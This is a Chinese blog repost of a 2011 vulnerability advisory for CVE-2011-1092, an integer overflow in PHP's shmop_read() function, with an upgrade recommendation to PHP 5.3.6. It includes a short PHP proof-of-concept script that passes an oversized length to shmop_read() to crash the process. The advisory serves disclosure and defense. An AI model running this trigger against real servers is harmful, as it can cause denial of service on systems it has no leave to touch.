php ->read(),PHP “shmop_read()”远程整数溢出漏洞

这篇博客详细介绍了PHP中shmop_read()函数存在的远程整数溢出漏洞,该漏洞可能导致远程攻击者在受影响的网络服务器上执行任意代码或引发拒绝服务。测试方法和建议的补丁措施也一并提供。建议使用PHP 5.3.6及以上版本以避免此问题。
摘要由CSDN通过智能技术生成

发布日期:2011-03-08

更新日期:2011-03-08

受影响系统:

PHP PHP 5.x

不受影响系统:

PHP PHP 5.3.6

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 46786

CVE ID: CVE-2011-1092

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP的"shmop_read()"函数在实现上存在远程整数溢出漏洞,远程攻击者可利用此漏洞在受影响网络服务器中执行任意代码,造成拒绝服务。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Jose Carlos Norte ()提供了如下测试方法:

<?php

$shm_key = ftok(__FILE__, 't');

$shm_id = shmop_open($shm_key, "c", 0644, 100);

$shm_data = shmop_read($shm_id, 1, 2147483647);

//if there is no segmentation fault past this point, we have 2gb of

memory!

echo $shm_data;

?>

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP

---

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

0b1331709591d260c1c78e86d0c51c18.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值